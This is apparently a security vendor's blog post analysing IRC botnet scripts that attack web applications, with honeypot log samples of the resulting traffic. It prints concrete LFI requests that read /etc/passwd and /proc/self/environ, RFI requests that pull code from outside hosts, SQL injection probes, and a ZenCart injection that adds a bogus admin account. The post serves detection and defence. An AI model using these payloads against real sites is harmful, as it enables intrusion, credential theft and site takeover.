Have you ever wondered what script/code/tool was behind the automated web attacks that you see in your web server log files? This blog post will shed some light on one of the most common tactics used by web attackers: Botnet Web Attack Scripts.
What we are finding when analyzing attacking IP address (as part of our IP Reputation data feed for the commercial ModSecurity rules) is that a large portion of these attacking sources are actually compromised web servers. Attackers are exploiting various web application vulnerabilities through attacks such as RFI to download and execute attacker code.
Trustwave SpiderLabs Research Team has obtained a large number of scripts and tools from these attack source websites and analyzed their capabilities. Let't take a look at some common functionality.
If the RFI attack succeeds, then botnet client code will usually log into an IRC channel from the web server host.
This section of code shows how the botnet client will hide itself within the log process table (ps) listing by looking like an apache httpd process. It will log into a specific IRC server (irc.priv8.in) on a specific port (6667) and access the #norman channel.
Once the client is logged into the IRC channel, the operator can send commands for the client to execute. Such as to run Search Engine queries to identify other vunerable web servers. Here is a list of Search Engines that they will use:
Here is a snippet of the "lfi" function that will take the Search Engine queries and executes various exploit payloads. Notice the bolded sections some example LFI attack payloads:
We have seen these attacks before in our honeypots:
GET /cart.php?a=antisec&templatefile=../../../../../../../../../../../../../../../etc/passwd%0000 HTTP/1.1GET /cart.php?a=psxteam&templatefile=../../../../../../../../../../../../../../../etc/passwd%0000 HTTP/1.1GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=/proc/self/environ HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=/proc/self/environ%0000 HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1
Here is a snippet of the !rfi function that will attempt remote file inclusion attacks:
Here is how these attacks looks when received by our honeypots:
GET /admin///?_zb_path=http://www.REDACTED.de/plugins/rik.jpg?? HTTP/1.1GET /admin//?_zb_path=http://www.REDACTED.com/uccl-sy/images/byroe.jpg?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/black.jpg?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/daster.jpg?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j1.txt?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j2.txt?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j3.txt?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/topi.jpg?? HTTP/1.1GET //ask_password.php?dir=http://www.REDACTED.hu/e107_images/fileinspector/banner.jpg??? HTTP/1.1GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.REDACTED.com.br/v3/pgm//common/metabase/id.gif?????????????? HTTP/1.1GET /bad_link.php?theme_path=http://REDACTED.kr/bbs//icon/dd--.gif?????? HTTP/1.1GET /bad_link.php?theme_path=http://www.REDACTED.gov.tw//appserv/c2d.gif????? HTTP/1.1GET /bad_link.php?theme_path=?src=http://REDACTED.com.airatrip.com/temp/phantom.php HTTP/1.1GET //bbs///////delete_all.php?board_skin_path=http://www.REDACTED.org/wp-content/languages/zfxid1.txt??? HTTP/1.1
Here is a snippet of the !sqli function that executes SQL Injection attacks:
The attacks simply append a single quote character to various parameter fields and then inspect the response html for signs of SQL related error messages. Here is how these attacks look in our honeypot logs:
GET /index.php?keyword=' HTTP/1.1GET //log.php?id=' HTTP/1.1GET /logs/error_log/submitComment.php?DOCUMENT_ROOT=' HTTP/1.1GET /logs/submitComment.php?DOCUMENT_ROOT=' HTTP/1.1GET //mail.php?id=' HTTP/1.1GET /order.php?id=' HTTP/1.1GET /osc/shopping_cart.php?id=' HTTP/1.1GET /page.php?id=' HTTP/1.1GET /product.php?id=' HTTP/1.1GET /produto.php?id=' HTTP/1.1GET /shop.php?id=' HTTP/1.1GET /shopping_cart.php?cadid=' HTTP/1.1GET /shopping_cart.php?pid=' HTTP/1.1GET /submitComment.php?DOCUMENT_ROOT=' HTTP/1.1GET //upload.php?id=' HTTP/1.1
Here is a snippet of the !zen function that executes attacks against ZenCart vulnerabilities:
This section of code attempts to use SQL Injection to insert bogus admin user account data. Here is how these attacks look when they are received by our honeypots:
POST /store//admin/sqlpatch.php/password_forgotten.php?action=execute...query_string=insert into admin (admin_id, admin_name, admin_email, admin_pass) values (30, 'wew', 'antisux.com', '617ec22fbb8f201c366e9848c0eb6925:87');
When an attacker wants to execute a specific type of attack, they will issue commands from the IRC botnet channel using this syntax - > !cmd. Here is a sampling of the functions available:
Notice the syntax of using the exclamation point (!) before the function name. While reviewing the honeypot/sensor logs, we see a fair amount of examples where the attack code is not properly executing the function call but instead just sending the text in the live HTTP requests. Here are some examples:
69.65.40.230 - - [10/May/2012:07:34:36 -0400] "GET /!lfi../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"188.165.237.143 - - [01/Apr/2012:15:03:18 +0900] "GET /!rfitest?? HTTP/1.1" 404 214
188.165.237.143 - - [01/Apr/2012:15:03:20 +0900] "GET /!rfihttp://kortech.cn/bbs//skin/zero_vote/fx29id2.txt???? HTTP/1.1" 404 25946.105.99.149 - - [24/Jan/2012:08:10:04 +0100] "GET /!sql' HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"96.250.100.147 - - [14/Mar/2012:07:07:42 +0900] "POST /!zen HTTP/1.1" 404 284
If you see these types of requests within your log file, you can be assured that a botnet client is attacking your site.
While secure coding priciples are always the first line of defense against these types of injection-based attacks, the fact is that the majority of these attacks are targeting 3rd party applications. This means that the web sites running these applications did not write them and therefore are reliant upon the product developers to release updates to fix the vulnerabilities. It is paramount that organizations keep up-to-date on patch updates and upgrades and get them install as soon as possible.
In this scenario, a Web Application Firewall (WAF) is a great protection mechanism. Trustwave's WAF customers (WebDefend and ModSecurity) are protected against these types of attacks.
